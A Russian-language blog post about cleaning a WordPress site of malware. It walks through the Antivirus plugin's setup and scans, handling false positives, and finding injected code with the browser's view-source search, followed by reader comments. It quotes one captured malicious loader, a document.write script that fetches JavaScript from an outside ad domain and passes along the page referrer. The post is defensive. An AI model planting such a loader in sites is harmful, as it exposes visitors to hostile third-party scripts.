Уберите вирус с сайта!

Именно такой комментарий я получил сегодня от одного из моих читателей, поэтому решил снова включить плагин для обнаружения вирусов на своем сайте.

Действительно, как только я вошел на сайт сегодня после второго включения компьютера во второй половине дня, обнаружил, что при открытии записей (не главной) вверху страниц обнаружились сторонние всплывающие окна, приглашающие принять участие в игре. Закрыв (дважды) надоедливые баннеры, я достиг того, что они не стали больше появляться. Жалоб от комментаторов, которые заходили раньше и вновь, не поступало — и я успокоился.

И тут вдруг, через контактную форму пришел комментарий:

Уберите вирус с сайта!

Спросив комментатора, в чем выражается форма проявления вируса и не получив ответ , я решил найти вирус с помощью плагина Antivirus, а заодно рассказать о способе его установки, работы и настроек.

Сначала небольшое отступление. Антивирус, как я уже упоминал, раньше был активирован на моем блоге, но выдавал многие файлы из моего шаблона как вирусы. Дело в том, что мой шаблон версии ниже 3,  и  последняя версия  версия  вордпресс немного конфликтует с шаблоном. Особенно это проявляется при установки  плагина-антивируса и запуске первого сканирования вручную.

Поэтому в своем рассказе я подчеркну эту проблему потому, что у других пользователей плагином, для обнаружения вирусов на сайте, тоже может произойти аналогичная история.

Установка плагина

… проста до безобразия: «Плагины», в строке поиска (по слову) написать Antivirus и, выбрав самый верхний из предложенных(он так и называется), активировать его.

Откройте «Параметры», выберете «Antivirus» и зайдите на страницу настроек:

По указанным стрелкам видно, что можно провести ручное сканирование сайта. Сделаем его. Если после сканирования у вас все блоки  будут выделены цветом «все ясно», то это просто замечательно. Но если будет обнаружен вирус(вирусы), то система выдаст файлы, которые она воспринимает как вирусы, выделив их желтым цветом.

Но вы не спешите удалять их, а кликните на запись «Посмотреть строку в редакторе»

и если вам откроются такие страницы…

…то нажимайте «Это не вирус». И так до тех пор, пока не проверите все подозрительные файлы. Вообще, если вы посчитаете какой- либо файл вирусом, не спешите его удалять, а прежде сделайте резервную копию общего файла шаблона — footer.php и ему подобных). Вирус окажется не вирусом, а  страницы сайта не станут открываться.
Далее, после выполнения рекомендаций плагина и удаления вирусных файлов, которые вам предстоит найти по их названиям на странице сканирования, вновь сделайте ручное сканирование. Если все нормально, все блоки будут одинакового цвета — «все ясно»:

 

Теперь установим «галочку» «Включить ежедневное сканирование…» и сохраним изменения. Антивирус будет в постоянном режиме обнаруживать вирусы и сообщать о таковых на вашу  почту.

Обнаружение вируса с помощью антивирусной программы

Если у вас на компьютере установлен хороший антивирус и сделаны соответствующие настройки, то он обязательно предупредит, а то и заблокирует страницу сайта, на котором есть (по мнению антивируса) вредоносный код. При этом сообщит его адрес (ссылку), что-то вроде такого, как однажды появился у меня

http://adrichmedia.info/codes/24246/28746_prt56.ru.js

Если пройти по адресу, откроется окно с вредоносным скрипт-кодом

var IdSite=28746;document.write(‘<scr’+’ipt type=»text/javascript» src=»http://adrichmedia.info/cgi/gask.cgi?ids=’+IdSite+’&ref=’+escape(document.referrer)+'»></scr’+’ipt

Для того, что бы его быстро найти, воспользуйтесь возможностями вашего браузера. Мой любимый браузер Mozilla Firefox, поэтому следующий пример по проведению операции обнаружения вирусного кода — демонстрация его возможностей. Подобные операции можно проводить и на других браузерах.

Итак у вас уже есть адрес, на который указывает антивирусная программа. Откройте исходный код станицы вирусного сайта с помощью двух кнопок клавиатуры Ctrl+U (или в панели инструментов браузера  кликните  «вид»>»исходный код страницы»), затем нажмите Ctrl+F и внизу всей страницы появится блок для нахождения нужного кода.  Вставьте в него например адрес, который обнаружил вирус http://adrichmedia.info/codes/24246/28746_prt56.ru.js

Если, вирусный код не обнаружится, то появится сообщение «Фраза не найдена», если вводимый адрес имеет место быть, откроется то место (строка), где он расположен и с подсветкой. Просмотрев место в коде страницы, вы сможете определить, где же засел вирус или нужный вам адрес( так можно находить не только вирусы).
Друзья, я желаю, что бы у вас никогда не было вирусов на сайте, но плагины и антивирусы используйте всегда.

Бесплатный сервис для проверки наличия вирусов на сайте

Есть такой сайт, где предоставляют (new) такую возможность: http://gimpel.ru/proverka, а я бесплатно, даю ссылку :). Все, что нужно сделать видно из скриншота:

Ответ придет на ваш e-mail, который вы укажите, но не сразу. Придется подождать сутки-двое. Удачи!

Уважаемые читатели, если при открытии страниц моего сайта, вы обнаружите что-то подозрительное, ПОЖАЛУЙСТА, сообщите мне любым удобным для вас  способом.

Но лучше бы таких писем не было.

2 комментариев “Уберите вирус с сайта!

  1. Киса:

    К сожалению плагин не помог найти вирус на сайте, пришлось все сносить и ставить заново.

  2. Геннадий Михайлюта:

    Жаль.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *